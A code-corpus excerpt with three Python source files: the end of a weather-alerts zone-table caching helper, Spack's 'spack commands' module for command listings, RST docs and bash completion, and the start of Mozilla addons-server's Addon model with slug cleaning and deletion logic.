        logging.error('unable to determine "zone" or "county". Returning None.')
        return None
    localfile = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
    logging.info('Checking for existence of %s locally.', localfile)
    # Fetch and cache the table the first time it is needed.
    if not os.path.exists(localfile):
        locally_cache_zone_table(alerts_url, stateabbr, zoneorcounty)
    if os.path.exists(localfile):
        return retrieve_local_zone_table(stateabbr, zoneorcounty)
    logging.error('Unable to retrieve zone table. Returning None.')
    return None
def retrieve_local_zone_table(stateabbr, zoneorcounty):
    """
    Retrieve a locally cached copy of the zone/county table and return the
    <tr> rows of the fourth <table> element in the page.
    """
    filename = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
    with open(filename, 'r') as localcopy:
        soup = BeautifulSoup(localcopy.read(), 'lxml')
    # The zone listing lives in the fourth table on the page.
    zone_table = soup.find_all('table')[3]
    return zone_table.find_all('tr')
def locally_cache_zone_table(alerts_url, stateabbr, zoneorcounty):
    """
    The zones and counties change so infrequently that it makes no sense to
    retrieve the data live, and locally caching the data will improve
    performance.

    :returns: True when the table was fetched and written, False when the
        fetch failed, or None for a bad ``zoneorcounty`` value.
    """
    if zoneorcounty == 'zone':
        x_value = 2
    elif zoneorcounty == 'county':
        x_value = 3
    else:
        return None
    page = '{0}.php'.format(stateabbr)
    rooturl = os.path.join(alerts_url, page)
    payload = {'x': x_value}
    logging.debug('Retrieving: %s -- with payload %s', rooturl, payload)
    returned_table = make_request(url=rooturl, payload=payload, use_json=False)
    # Bug fix: make_request() returns None on failure.  Writing None raised
    # TypeError *after* open('w') had already truncated/created the file,
    # leaving an empty (corrupt) cache that later parses would trip over.
    if returned_table is None:
        logging.error('Unable to retrieve zone table for caching.')
        return False
    filename = 'local_{1}_table_{0}.html'.format(stateabbr, zoneorcounty)
    with open(filename, 'w') as localcopy:
        localcopy.write(returned_table)
    return True
def parse_zone_table(county, rows):
    """
    find the zone or county abbreviation within a returned table that includes
    a county name or area name to match.  Returns None when no row matches.
    """
    target = county.lower()
    for row in rows:
        cells = row.find_all('td')
        # Header/spacer rows have fewer than two cells; skip them.
        if len(cells) <= 1:
            continue
        # Column 2 holds the human-readable name, column 1 the abbreviation.
        if cells[2].text.lower() == target:
            return cells[1].text.strip()
    return None
def make_timestamp():
    """
    Returns tuple of two strings: "YYYYMMDD" and "HHMMSS"
    """
    # Take one UTC reading so both parts reflect the same instant.
    now = datetime.utcnow()
    return (now.strftime('%Y%m%d'), now.strftime('%H%M%S'))
| 32.266559 | 94 | 0.608972 |
ace758d339dffff51856b202751b4b92838b7da4 | 9,480 | py | Python | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2020-09-10T22:50:08.000Z | 2021-01-12T22:18:54.000Z | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 | 2021-07-20T01:04:53.000Z | 2022-03-02T01:08:36.000Z | lib/spack/spack/cmd/commands.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2021-05-06T00:17:46.000Z | 2021-05-06T00:17:46.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from __future__ import print_function
import argparse
import copy
import os
import re
import sys
import llnl.util.filesystem as fs
import llnl.util.tty as tty
from llnl.util.argparsewriter import (
ArgparseWriter, ArgparseRstWriter, ArgparseCompletionWriter
)
from llnl.util.tty.colify import colify
import spack.cmd
import spack.main
import spack.paths
from spack.main import section_descriptions
# Metadata consumed by spack's command framework (`spack help` sections).
description = "list available spack commands"
section = "developer"
level = "long"

#: list of command formatters
formatters = {}

#: standard arguments for updating completion scripts
#: we iterate through these when called with --update-completion
update_completion_args = {
    "bash": {
        "aliases": True,
        "format": "bash",
        "header": os.path.join(
            spack.paths.share_path, "bash", "spack-completion.in"),
        "update": os.path.join(
            spack.paths.share_path, "spack-completion.bash"),
    },
}
def formatter(func):
    """Decorator used to register formatters"""
    # Register under the function's own name so --format=<name> finds it.
    name = func.__name__
    formatters[name] = func
    return func
def setup_parser(subparser):
    """Define the ``spack commands`` CLI: output format selection, optional
    header file, conditional output-file update, and completion refresh."""
    subparser.add_argument(
        "--update-completion", action='store_true', default=False,
        help="regenerate spack's tab completion scripts")

    subparser.add_argument(
        '-a', '--aliases', action='store_true', default=False,
        help='include command aliases')
    subparser.add_argument(
        '--format', default='names', choices=formatters,
        help='format to be used to print the output (default: names)')
    subparser.add_argument(
        '--header', metavar='FILE', default=None, action='store',
        help='prepend contents of FILE to the output (useful for rst format)')
    subparser.add_argument(
        '--update', metavar='FILE', default=None, action='store',
        help='write output to the specified file, if any command is newer')
    subparser.add_argument(
        'rst_files', nargs=argparse.REMAINDER,
        help='list of rst files to search for `_cmd-spack-<cmd>` cross-refs')
class SpackArgparseRstWriter(ArgparseRstWriter):
    """RST writer tailored for spack documentation."""

    def __init__(self, prog, out=None, aliases=False,
                 documented_commands=None,
                 rst_levels=None):
        """
        :param prog: program name (e.g. ``spack``)
        :param out: stream to write to (defaults to stdout)
        :param aliases: whether to include command aliases
        :param documented_commands: commands that have a dedicated docs
            section (used to emit cross-reference links)
        :param rst_levels: section-underline characters per nesting level
        """
        # Fix: the previous signature used mutable default arguments
        # (a list literal for both parameters), which are shared across
        # calls; default to None and build fresh lists here instead.
        if documented_commands is None:
            documented_commands = []
        if rst_levels is None:
            rst_levels = ['-', '-', '^', '~', ':', '`']
        out = sys.stdout if out is None else out
        super(SpackArgparseRstWriter, self).__init__(
            prog, out, aliases, rst_levels)
        self.documented = documented_commands

    def usage(self, *args):
        """Append a docs cross-reference below the usage string for
        commands that have a dedicated documentation section."""
        string = super(SpackArgparseRstWriter, self).usage(*args)

        cmd = self.parser.prog.replace(' ', '-')
        if cmd in self.documented:
            string += '\n:ref:`More documentation <cmd-{0}>`\n'.format(cmd)
        return string
class SubcommandWriter(ArgparseWriter):
    """Writer that emits one indented line per (sub)command name."""

    def format(self, cmd):
        # Indent by nesting level so subcommands appear under their parent.
        indent = ' ' * self.level
        return '%s%s\n' % (indent, cmd.prog)
# Map from (a prefix of) a positional argument's name to the bash helper
# subroutine that generates completions for it.
_positional_to_subroutine = {
    'package': '_all_packages',
    'spec': '_all_packages',
    'filter': '_all_packages',
    'installed': '_installed_packages',
    'compiler': '_installed_compilers',
    'section': '_config_sections',
    'env': '_environments',
    'extendable': '_extensions',
    'keys': '_keys',
    'help_command': '_subcommands',
    'mirror': '_mirrors',
    'virtual': '_providers',
    'namespace': '_repos',
    'hash': '_all_resource_hashes',
    'pytest': '_tests',
}
class BashCompletionWriter(ArgparseCompletionWriter):
    """Write argparse output as bash programmable tab completion."""

    def body(self, positionals, optionals, subcommands):
        """Emit the completion body for one (sub)command.

        When positionals or subcommands exist, options are offered only
        when the current word starts with a dash ($list_options); the
        positional/subcommand completions are offered otherwise.
        """
        if positionals:
            return """
    if $list_options
    then
        {0}
    else
        {1}
    fi
""".format(self.optionals(optionals), self.positionals(positionals))
        elif subcommands:
            return """
    if $list_options
    then
        {0}
    else
        {1}
    fi
""".format(self.optionals(optionals), self.subcommands(subcommands))
        else:
            return """
    {0}
""".format(self.optionals(optionals))

    def positionals(self, positionals):
        """Return the bash subroutine that completes the first recognized
        positional argument, or an empty reply when none matches."""
        # If match found, return function name
        for positional in positionals:
            for key, value in _positional_to_subroutine.items():
                if positional.startswith(key):
                    return value

        # If no matches found, return empty list
        return 'SPACK_COMPREPLY=""'

    def optionals(self, optionals):
        """Complete with the literal option strings."""
        return 'SPACK_COMPREPLY="{0}"'.format(' '.join(optionals))

    def subcommands(self, subcommands):
        """Complete with the subcommand names."""
        return 'SPACK_COMPREPLY="{0}"'.format(' '.join(subcommands))
@formatter
def subcommands(args, out):
    """Print a hierarchical list of all (sub)commands."""
    arg_parser = spack.main.make_argument_parser()
    spack.main.add_all_commands(arg_parser)
    SubcommandWriter(arg_parser.prog, out, args.aliases).write(arg_parser)
def rst_index(out):
    """Write an RST two-column table mapping each command category to
    cross-references for its commands (8 refs per table row)."""
    out.write('\n')

    index = spack.main.index_commands()
    sections = index['long']

    # column widths for the category and command columns
    dmax = max(len(section_descriptions.get(s, s)) for s in sections) + 2
    cmax = max(len(c) for _, c in sections.items()) + 60

    row = "%s %s\n" % ('=' * dmax, '=' * cmax)
    line = '%%-%ds %%s\n' % dmax

    out.write(row)
    out.write(line % (" Category ", " Commands "))
    out.write(row)
    for section, commands in sorted(sections.items()):
        description = section_descriptions.get(section, section)
        for i, cmd in enumerate(sorted(commands)):
            # Only the first line of a category carries its description.
            description = description.capitalize() if i == 0 else ''
            ref = ':ref:`%s <spack-%s>`' % (cmd, cmd)
            comma = ',' if i != len(commands) - 1 else ''
            bar = '| ' if i % 8 == 0 else ' '
            out.write(line % (description, bar + ref + comma))
    out.write(row)
@formatter
def rst(args, out):
    """Write RST documentation (index plus one section per command)."""
    # a parser that knows every spack command
    cmd_parser = spack.main.make_argument_parser()
    spack.main.add_all_commands(cmd_parser)

    # collect cross-refs of the form `_cmd-spack-<cmd>:` from the rst files
    documented_commands = set()
    pattern = re.compile(r'\.\. _cmd-(spack-.*):')
    for filename in args.rst_files:
        with open(filename) as f:
            for line in f:
                match = pattern.match(line)
                if match:
                    documented_commands.add(match.group(1).strip())

    # index of all commands first
    rst_index(out)
    out.write('\n')

    # then a section for each command and subcommand
    writer = SpackArgparseRstWriter(
        cmd_parser.prog, out, args.aliases, documented_commands)
    writer.write(cmd_parser)
@formatter
def names(args, out):
    """Print a flat, columnified list of command names."""
    all_names = copy.copy(spack.cmd.all_commands())
    if args.aliases:
        for alias in spack.main.aliases.keys():
            all_names.append(alias)
    colify(all_names, output=out)
@formatter
def bash(args, out):
    """Print bash programmable tab completion for all commands."""
    bash_parser = spack.main.make_argument_parser()
    spack.main.add_all_commands(bash_parser)
    BashCompletionWriter(bash_parser.prog, out, args.aliases).write(bash_parser)
def prepend_header(args, out):
    """Copy the contents of ``args.header`` (if any was given) into ``out``."""
    if args.header:
        with open(args.header) as header_file:
            out.write(header_file.read())
def _commands(parser, args):
    """This is the 'regular' command, which can be called multiple times.

    See ``commands()`` below for ``--update-completion`` handling.
    """
    formatter = formatters[args.format]

    # check header first so we don't open out files unnecessarily
    if args.header and not os.path.exists(args.header):
        tty.die("No such file: '%s'" % args.header)

    # if we're updating an existing file, only write output if a command
    # or the header is newer than the file.
    if args.update:
        if os.path.exists(args.update):
            files = [
                spack.cmd.get_module(command).__file__.rstrip('c')  # pyc -> py
                for command in spack.cmd.all_commands()]
            if args.header:
                files.append(args.header)
            last_update = os.path.getmtime(args.update)
            # skip the rewrite entirely when nothing is newer than the target
            if not any(os.path.getmtime(f) > last_update for f in files):
                tty.msg('File is up to date: %s' % args.update)
                return

        tty.msg('Updating file: %s' % args.update)
        with open(args.update, 'w') as f:
            prepend_header(args, f)
            formatter(args, f)

        if args.update_completion:
            # completion scripts must be executable to be sourced/run
            fs.set_executable(args.update)
    else:
        prepend_header(args, sys.stdout)
        formatter(args, sys.stdout)
def update_completion(parser, args):
    """Iterate through the shells and update the standard completion files.

    This is a convenience method to avoid calling this command many
    times, and to simplify completion update for developers.
    """
    for shell_args in update_completion_args.values():
        # overwrite the relevant args namespace attributes for this shell
        for attr, value in shell_args.items():
            setattr(args, attr, value)
        _commands(parser, args)
def commands(parser, args):
    """Entry point for ``spack commands``."""
    if not args.update_completion:
        # run commands normally
        return _commands(parser, args)

    # --update-completion is mutually exclusive with every other option
    has_other_options = (
        args.format != 'names' or
        any([args.aliases, args.update, args.header]))
    if has_other_options:
        tty.die("--update-completion can only be specified alone.")

    # this runs the command multiple times with different arguments
    return update_completion(parser, args)
ace759fbc70b6d36fc0f0e1536456c06c1cf0cf0 | 81,352 | py | Python | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T10:02:15.000Z | 2020-12-03T10:02:15.000Z | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | null | null | null | src/olympia/addons/models.py | makyen/Mozilla-addons-server | 555d9f31cc4b00799466f16c8809edd5f1858ab8 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import collections
import itertools
import json
import os
import posixpath
import re
import time
from operator import attrgetter
from datetime import datetime
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.db import models, transaction
from django.db.models import F, Max, Q, signals as dbsignals
from django.dispatch import receiver
from django.utils.functional import cached_property
from django.utils.translation import trans_real, ugettext_lazy as _
import caching.base as caching
from django_extensions.db.fields.json import JSONField
from django_statsd.clients import statsd
from jinja2.filters import do_dictsort
import olympia.core.logger
from olympia import activity, amo, core
from olympia.amo.models import (
SlugField, OnChangeMixin, ModelBase, ManagerBase, manual_order)
from olympia.access import acl
from olympia.addons.utils import (
get_creatured_ids, get_featured_ids, generate_addon_guid)
from olympia.amo import helpers
from olympia.amo.decorators import use_master, write
from olympia.amo.utils import (
attach_trans_dict, cache_ns_key, chunked,
no_translation, send_mail, slugify, sorted_groupby, timer, to_language,
urlparams, find_language, AMOJSONEncoder)
from olympia.amo.urlresolvers import get_outgoing_url, reverse
from olympia.constants.categories import CATEGORIES, CATEGORIES_BY_ID
from olympia.files.models import File
from olympia.files.utils import (
extract_translations, resolve_i18n_message, parse_addon)
from olympia.reviews.models import Review
from olympia.tags.models import Tag
from olympia.translations.fields import (
LinkifiedField, PurifiedField, save_signal, TranslatedField, Translation)
from olympia.users.models import UserForeignKey, UserProfile
from olympia.versions.compare import version_int
from olympia.versions.models import inherit_nomination, Version
from . import signals
log = olympia.core.logger.getLogger('z.addons')
def clean_slug(instance, slug_field='slug'):
    """Cleans a model instance slug.

    This strives to be as generic as possible as it's used by Addons
    and Collections, and maybe more in the future.

    :param instance: model instance whose ``slug_field`` attribute is
        normalized in place (the instance is NOT saved here).
    :param slug_field: name of the slug attribute on ``instance``.
    :returns: the same ``instance``, with a unique slug set.
    :raises RuntimeError: when no free suffix could be found (pathological
        number of clashes on a near-max-length slug).
    """
    slug = getattr(instance, slug_field, None) or instance.name

    if not slug:
        # Initialize the slug with what we have available: a name translation,
        # or the id of the instance, or in last resort the model name.
        translations = Translation.objects.filter(id=instance.name_id)
        if translations.exists():
            slug = translations[0]
        elif instance.id:
            slug = str(instance.id)
        else:
            slug = instance.__class__.__name__

    max_length = instance._meta.get_field_by_name(slug_field)[0].max_length
    slug = slugify(slug)[:max_length]

    if DeniedSlug.blocked(slug):
        slug = slug[:max_length - 1] + '~'

    # The following trick makes sure we are using a manager that returns
    # all the objects, as otherwise we could have a slug clash on our hands.
    # Eg with the "Addon.objects" manager, which doesn't list deleted addons,
    # we could have a "clean" slug which is in fact already assigned to an
    # already existing (deleted) addon. Also, make sure we use the base class.
    manager = models.Manager()
    manager.model = instance._meta.proxy_for_model or instance.__class__

    qs = manager.values_list(slug_field, flat=True)  # Get list of all slugs.
    if instance.id:
        qs = qs.exclude(pk=instance.id)  # Can't clash with itself.

    # We first need to make sure there's a clash, before trying to find a
    # suffix that is available. Eg, if there's a "foo-bar" slug, "foo" is still
    # available.
    clash = qs.filter(**{slug_field: slug})

    if clash.exists():
        # Leave space for 99 clashes.
        slug = slugify(slug)[:max_length - 2]

        # There is a clash, so find a suffix that will make this slug unique.
        lookup = {'%s__startswith' % slug_field: slug}
        clashes = qs.filter(**lookup)

        # Try numbers between 1 and the number of clashes + 1 (+ 1 because we
        # start the range at 1, not 0):
        # if we have two clashes "foo1" and "foo2", we need to try "foox"
        # for x between 1 and 3 to be absolutely sure to find an available one.
        for idx in range(1, len(clashes) + 2):
            new = ('%s%s' % (slug, idx))[:max_length]
            if new not in clashes:
                slug = new
                break
        else:
            # This could happen. The current implementation (using
            # ``[:max_length -3]``) only works for the first 100 clashes in the
            # worst case (if the slug is equal to or longuer than
            # ``max_length - 3`` chars).
            # After that, {verylongslug}-100 will be trimmed down to
            # {verylongslug}-10, which is already assigned, but it's the last
            # solution tested.
            raise RuntimeError

    setattr(instance, slug_field, slug)

    return instance
class AddonQuerySet(caching.CachingQuerySet):

    def id_or_slug(self, val):
        """Filter on the primary key, or the slug for non-numeric strings."""
        use_slug = isinstance(val, basestring) and not val.isdigit()
        lookup = 'slug' if use_slug else 'id'
        return self.filter(**{lookup: val})

    def enabled(self):
        """Exclude add-ons disabled by their developer(s)."""
        return self.filter(disabled_by_user=False)

    def public(self):
        """Restrict to public add-ons only."""
        return self.filter(self.valid_q([amo.STATUS_PUBLIC]))

    def valid(self):
        """Restrict to valid, enabled add-ons only."""
        return self.filter(self.valid_q(amo.VALID_ADDON_STATUSES))

    def valid_and_disabled_and_pending(self):
        """
        Get valid, pending, enabled and disabled add-ons.

        Used to allow pending theme pages to still be viewed.
        """
        statuses = (list(amo.VALID_ADDON_STATUSES) +
                    [amo.STATUS_DISABLED, amo.STATUS_PENDING])
        qs = self.filter(Q(status__in=statuses) | Q(disabled_by_user=True))
        return qs.exclude(type=amo.ADDON_EXTENSION,
                          _current_version__isnull=True)

    def featured(self, app, lang=None, type=None):
        """All featured add-ons for an application, in all locales."""
        featured_ids = get_featured_ids(app, lang, type)
        return manual_order(self.listed(app), featured_ids, 'addons.id')

    def listed(self, app, *status):
        """
        Add-ons that support ``app``, have a file matching ``status`` and
        are not disabled.  Defaults to STATUS_PUBLIC when none is given.
        """
        if not status:
            status = [amo.STATUS_PUBLIC]
        return self.filter(self.valid_q(status), appsupport__app=app.id)

    def valid_q(self, status=None, prefix=''):
        """
        Build a Q object selecting a valid Addon with the given statuses.

        An add-on is valid if not disabled and has a current version.
        ``prefix`` lets callers hop across a join, e.g. ``prefix='addon__'``
        in CollectionAddon.
        """
        if not status:
            status = [amo.STATUS_PUBLIC]

        def prefixed(kw):
            # Rewrite lookup keys with the join prefix when one was given.
            if not prefix:
                return kw
            return dict((prefix + key, value) for key, value in kw.items())

        has_version = Q(**prefixed({'_current_version__isnull': False}))
        return Q(has_version, **prefixed({'disabled_by_user': False,
                                          'status__in': status}))
class AddonManager(ManagerBase):

    def __init__(self, include_deleted=False):
        # DO NOT change the default value of include_deleted unless you've
        # read through the comment just above the Addon managers
        # declaration/instantiation and understand the consequences.
        ManagerBase.__init__(self)
        self.include_deleted = include_deleted

    def get_queryset(self):
        """Base queryset: an AddonQuerySet with the Addon transformer,
        excluding deleted add-ons unless ``include_deleted`` is set."""
        qs = super(AddonManager, self).get_queryset()
        qs = qs._clone(klass=AddonQuerySet)
        if not self.include_deleted:
            qs = qs.exclude(status=amo.STATUS_DELETED)
        return qs.transform(Addon.transformer)

    def id_or_slug(self, val):
        """Get add-ons by id or slug."""
        return self.get_queryset().id_or_slug(val)

    def enabled(self):
        """Add-ons not disabled by their developer(s)."""
        return self.get_queryset().enabled()

    def public(self):
        """Public add-ons only."""
        return self.get_queryset().public()

    def valid(self):
        """Valid, enabled add-ons only."""
        return self.get_queryset().valid()

    def valid_and_disabled_and_pending(self):
        """Valid, pending, enabled and disabled add-ons (pending theme
        pages remain viewable)."""
        return self.get_queryset().valid_and_disabled_and_pending()

    def featured(self, app, lang=None, type=None):
        """All featured add-ons for an application, in all locales."""
        return self.get_queryset().featured(app, lang=lang, type=type)

    def listed(self, app, *status):
        """Add-ons supporting ``app`` with files in ``status``, not
        disabled."""
        return self.get_queryset().listed(app, *status)
class Addon(OnChangeMixin, ModelBase):
    # Personas override this in __init__ with their own choices.
    STATUS_CHOICES = amo.STATUS_CHOICES_ADDON

    # --- identity ---
    guid = models.CharField(max_length=255, unique=True, null=True)
    slug = models.CharField(max_length=30, unique=True, null=True)
    name = TranslatedField(default=None)
    default_locale = models.CharField(max_length=10,
                                      default=settings.LANGUAGE_CODE,
                                      db_column='defaultlocale')

    type = models.PositiveIntegerField(
        choices=amo.ADDON_TYPE.items(), db_column='addontype_id', default=0)
    status = models.PositiveIntegerField(
        choices=STATUS_CHOICES.items(), db_index=True, default=0)
    icon_type = models.CharField(max_length=25, blank=True,
                                 db_column='icontype')

    # --- translated/user-facing text ---
    homepage = TranslatedField()
    support_email = TranslatedField(db_column='supportemail')
    support_url = TranslatedField(db_column='supporturl')
    description = PurifiedField(short=False)
    summary = LinkifiedField()
    developer_comments = PurifiedField(db_column='developercomments')
    eula = PurifiedField()
    privacy_policy = PurifiedField(db_column='privacypolicy')
    the_reason = PurifiedField()
    the_future = PurifiedField()

    # --- ratings / download statistics (denormalized) ---
    average_rating = models.FloatField(max_length=255, default=0, null=True,
                                       db_column='averagerating')
    bayesian_rating = models.FloatField(default=0, db_index=True,
                                        db_column='bayesianrating')
    total_reviews = models.PositiveIntegerField(default=0,
                                                db_column='totalreviews')
    weekly_downloads = models.PositiveIntegerField(
        default=0, db_column='weeklydownloads', db_index=True)
    total_downloads = models.PositiveIntegerField(
        default=0, db_column='totaldownloads')
    hotness = models.FloatField(default=0, db_index=True)

    average_daily_downloads = models.PositiveIntegerField(default=0)
    average_daily_users = models.PositiveIntegerField(default=0)

    last_updated = models.DateTimeField(
        db_index=True, null=True,
        help_text='Last time this add-on had a file/version update')

    # --- flags ---
    disabled_by_user = models.BooleanField(default=False, db_index=True,
                                           db_column='inactive')
    view_source = models.BooleanField(default=True, db_column='viewsource')
    public_stats = models.BooleanField(default=False, db_column='publicstats')
    admin_review = models.BooleanField(default=False, db_column='adminreview')
    external_software = models.BooleanField(default=False,
                                            db_column='externalsoftware')
    dev_agreement = models.BooleanField(
        default=False, help_text="Has the dev agreement been signed?")
    auto_repackage = models.BooleanField(
        default=True, help_text='Automatically upgrade jetpack add-on to a '
                                'new sdk version?')

    target_locale = models.CharField(
        max_length=255, db_index=True, blank=True, null=True,
        help_text="For dictionaries and language packs")
    locale_disambiguation = models.CharField(
        max_length=255, blank=True, null=True,
        help_text="For dictionaries and language packs")

    # --- contributions ---
    wants_contributions = models.BooleanField(default=False)
    paypal_id = models.CharField(max_length=255, blank=True)
    charity = models.ForeignKey('Charity', null=True)

    suggested_amount = models.DecimalField(
        max_digits=9, decimal_places=2, blank=True,
        null=True, help_text=_('Users have the option of contributing more '
                               'or less than this amount.'))

    total_contributions = models.DecimalField(max_digits=9, decimal_places=2,
                                              blank=True, null=True)

    annoying = models.PositiveIntegerField(
        choices=amo.CONTRIB_CHOICES, default=0,
        help_text=_(u'Users will always be asked in the Add-ons'
                    u' Manager (Firefox 4 and above).'
                    u' Only applies to desktop.'))
    enable_thankyou = models.BooleanField(
        default=False, help_text='Should the thank you note be sent to '
                                 'contributors?')
    thankyou_note = TranslatedField()

    # --- relations ---
    authors = models.ManyToManyField('users.UserProfile', through='AddonUser',
                                     related_name='addons')
    categories = models.ManyToManyField('Category', through='AddonCategory')
    dependencies = models.ManyToManyField('self', symmetrical=False,
                                          through='AddonDependency',
                                          related_name='addons')

    _current_version = models.ForeignKey(Version, db_column='current_version',
                                         related_name='+', null=True,
                                         on_delete=models.SET_NULL)

    whiteboard = models.TextField(blank=True)

    is_experimental = models.BooleanField(default=False,
                                          db_column='experimental')
    reputation = models.SmallIntegerField(default=0, null=True)

    # The order of those managers is very important:
    # The first one discovered, if it has "use_for_related_fields = True"
    # (which it has if it's inheriting from caching.base.CachingManager), will
    # be used for relations like `version.addon`. We thus want one that is NOT
    # filtered in any case, we don't want a 500 if the addon is not found
    # (because it has the status amo.STATUS_DELETED for example).
    # The CLASS of the first one discovered will also be used for "many to many
    # relations" like `collection.addons`. In that case, we do want the
    # filtered version by default, to make sure we're not displaying stuff by
    # mistake. You thus want the CLASS of the first one to be filtered by
    # default.
    # We don't control the instantiation, but AddonManager sets include_deleted
    # to False by default, so filtering is enabled by default. This is also why
    # it's not repeated for 'objects' below.
    unfiltered = AddonManager(include_deleted=True)
    objects = AddonManager()

    class Meta:
        db_table = 'addons'
@staticmethod
def __new__(cls, *args, **kw):
try:
type_idx = Addon._meta._type_idx
except AttributeError:
type_idx = (idx for idx, f in enumerate(Addon._meta.fields)
if f.attname == 'type').next()
Addon._meta._type_idx = type_idx
return object.__new__(cls)
    def __unicode__(self):
        """Human-readable representation: "<pk>: <name>"."""
        return u'%s: %s' % (self.id, self.name)

    def __init__(self, *args, **kw):
        # Personas use their own status choices.
        super(Addon, self).__init__(*args, **kw)

        if self.type == amo.ADDON_PERSONA:
            self.STATUS_CHOICES = Persona.STATUS_CHOICES

    def save(self, **kw):
        """Ensure the slug is clean before every save."""
        self.clean_slug()
        super(Addon, self).save(**kw)
@classmethod
def search_public(cls):
"""Legacy search method for public add-ons.
Note that typically, code using this method do a search in ES but then
will fetch the relevant objects from the database using Addon.objects,
so deleted addons won't be returned no matter what ES returns. See
amo.search.ES and amo.search.ObjectSearchResults for more details.
In new code, use elasticsearch-dsl instead.
"""
return cls.search().filter(
is_disabled=False,
status__in=amo.REVIEWED_STATUSES,
current_version__exists=True)
@use_master
def clean_slug(self, slug_field='slug'):
if self.status == amo.STATUS_DELETED:
return
clean_slug(self, slug_field)
def is_soft_deleteable(self):
return self.status or Version.unfiltered.filter(addon=self).exists()
    @transaction.atomic
    def delete(self, msg='', reason=''):
        """Delete this add-on.

        Add-ons that ever had a status or a version are soft-deleted
        (status set to STATUS_DELETED, slug/current version freed) so logs
        survive; incomplete add-ons with no versions are hard-deleted.
        An admin notification email is sent on soft deletion.
        """
        # To avoid a circular import
        from . import tasks
        # Check for soft deletion path. Happens only if the addon status isn't
        # 0 (STATUS_INCOMPLETE) with no versions.
        soft_deletion = self.is_soft_deleteable()
        if soft_deletion and self.status == amo.STATUS_DELETED:
            # We're already done.
            return

        id = self.id

        # Fetch previews before deleting the addon instance, so that we can
        # pass the list of files to delete to the delete_preview_files task
        # after the addon is deleted.
        previews = list(Preview.objects.filter(addon__id=id)
                        .values_list('id', flat=True))

        if soft_deletion:
            # /!\ If we ever stop using soft deletion, and remove this code, we
            # need to make sure that the logs created below aren't cascade
            # deleted!
            log.debug('Deleting add-on: %s' % self.id)

            to = [settings.FLIGTAR]
            user = core.get_user()

            # Don't localize email to admins, use 'en-US' always.
            with no_translation():
                # The types are lazy translated in apps/constants/base.py.
                atype = amo.ADDON_TYPE.get(self.type).upper()
            context = {
                'atype': atype,
                'authors': [u.email for u in self.authors.all()],
                'adu': self.average_daily_users,
                'guid': self.guid,
                'id': self.id,
                'msg': msg,
                'reason': reason,
                'name': self.name,
                'slug': self.slug,
                'total_downloads': self.total_downloads,
                'url': helpers.absolutify(self.get_url_path()),
                'user_str': ("%s, %s (%s)" % (user.display_name or
                                              user.username, user.email,
                                              user.id) if user else "Unknown"),
            }

            email_msg = u"""
The following %(atype)s was deleted.
%(atype)s: %(name)s
URL: %(url)s
DELETED BY: %(user_str)s
ID: %(id)s
GUID: %(guid)s
AUTHORS: %(authors)s
TOTAL DOWNLOADS: %(total_downloads)s
AVERAGE DAILY USERS: %(adu)s
NOTES: %(msg)s
REASON GIVEN BY USER FOR DELETION: %(reason)s
""" % context
            log.debug('Sending delete email for %(atype)s %(id)s' % context)
            subject = 'Deleting %(atype)s %(slug)s (%(id)d)' % context

            # Update or NULL out various fields.
            models.signals.pre_delete.send(sender=Addon, instance=self)
            self._reviews.all().delete()
            # The last parameter is needed to automagically create an AddonLog.
            activity.log_create(amo.LOG.DELETE_ADDON, self.pk,
                                unicode(self.guid), self)
            self.update(status=amo.STATUS_DELETED, slug=None,
                        _current_version=None, modified=datetime.now())
            models.signals.post_delete.send(sender=Addon, instance=self)

            send_mail(subject, email_msg, recipient_list=to)
        else:
            # Real deletion path.
            super(Addon, self).delete()

        for preview in previews:
            tasks.delete_preview_files.delay(preview)

        return True
    @classmethod
    def initialize_addon_from_upload(cls, data, upload, channel):
        """Create and save an Addon from parsed upload ``data``.

        Reclaims the GUID from a previously deleted add-on when needed,
        generates a GUID for webextensions that lack one, resolves
        webextension translations, and falls back to the active request
        language when the declared default locale is unusable.
        """
        fields = cls._meta.get_all_field_names()
        guid = data.get('guid')
        old_guid_addon = None

        if guid:  # It's an extension.
            # Reclaim GUID from deleted add-on.
            try:
                old_guid_addon = Addon.unfiltered.get(guid=guid)
                old_guid_addon.update(guid=None)
            except ObjectDoesNotExist:
                pass

        generate_guid = (
            not data.get('guid', None) and
            data.get('is_webextension', False)
        )

        if generate_guid:
            data['guid'] = guid = generate_addon_guid()

        data = cls.resolve_webext_translations(data, upload)

        # Only keep keys that map to actual model fields.
        addon = Addon(**dict((k, v) for k, v in data.items() if k in fields))

        addon.status = amo.STATUS_NULL
        locale_is_set = (addon.default_locale and
                         addon.default_locale in (
                             settings.AMO_LANGUAGES +
                             settings.HIDDEN_LANGUAGES) and
                         data.get('default_locale') == addon.default_locale)
        if not locale_is_set:
            addon.default_locale = to_language(trans_real.get_language())

        addon.save()

        if old_guid_addon:
            # Keep a breadcrumb on the deleted add-on pointing at the new one.
            old_guid_addon.update(guid='guid-reused-by-pk-{}'.format(addon.pk))
            old_guid_addon.save()
        return addon
    @classmethod
    def create_addon_from_upload_data(cls, data, upload, channel, user=None,
                                      **kwargs):
        """Create an Addon from upload data and make ``user`` its author."""
        addon = cls.initialize_addon_from_upload(data, upload, channel,
                                                 **kwargs)
        AddonUser(addon=addon, user=user).save()
        return addon

    @classmethod
    def from_upload(cls, upload, platforms, source=None,
